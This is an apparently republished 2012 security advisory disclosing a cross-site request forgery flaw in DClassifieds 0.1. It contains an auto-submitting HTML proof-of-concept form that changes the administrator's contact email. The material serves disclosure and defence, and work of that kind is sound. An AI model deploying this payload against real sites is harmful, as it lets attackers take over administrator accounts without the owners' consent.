Lucene search
K

DClassifieds 0.1 Final Cross Site Request Forgery

🗓️ 25 Jan 2012 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Vulnerability in DClassifieds allows CSRF attacks to change sensitive informatio

Code
`Advisory ID: HTB23067  
Reference: https://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_dclassifieds.html  
Product: DClassifieds  
Vendor: www.dclassifieds.eu ( http://www.dclassifieds.eu/ )   
Vulnerable Version: 0.1 final and probably prior  
Tested Version: 0.1 final  
Vendor Notification: 04 January 2012   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Risk Level: Low   
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )   
  
  
Advisory Details:  
  
High-Tech Bridge SA Security Research Lab has discovered vulnerability in DClassifieds, which can be exploited to perform Сross-Site Request Rorgery (CSRF) attacks.  
  
The application allows authorized users to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to change administrator's password or email.  
  
An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.  
  
This PoC code will change administrator's email:   
  
  
<form action="http://[host]/admin/settings/update/id/4" method="post">  
<input type="hidden" name="Settings[setting_name]" value="CONTACT_EMAIL">  
<input type="hidden" name="Settings[setting_value]" value="[email protected]">  
<input type="hidden" name="Settings[setting_description]" value="Contact email">  
<input type="hidden" name="Settings[setting_show_in_admin]" value="1">  
<input type="hidden" name="yt0" value="Save">  
<input type="submit" id="btn">   
</form>  
<script>  
document.getElementById('btn').click();  
</script>  
  
  
  
  
  
Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jan 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
20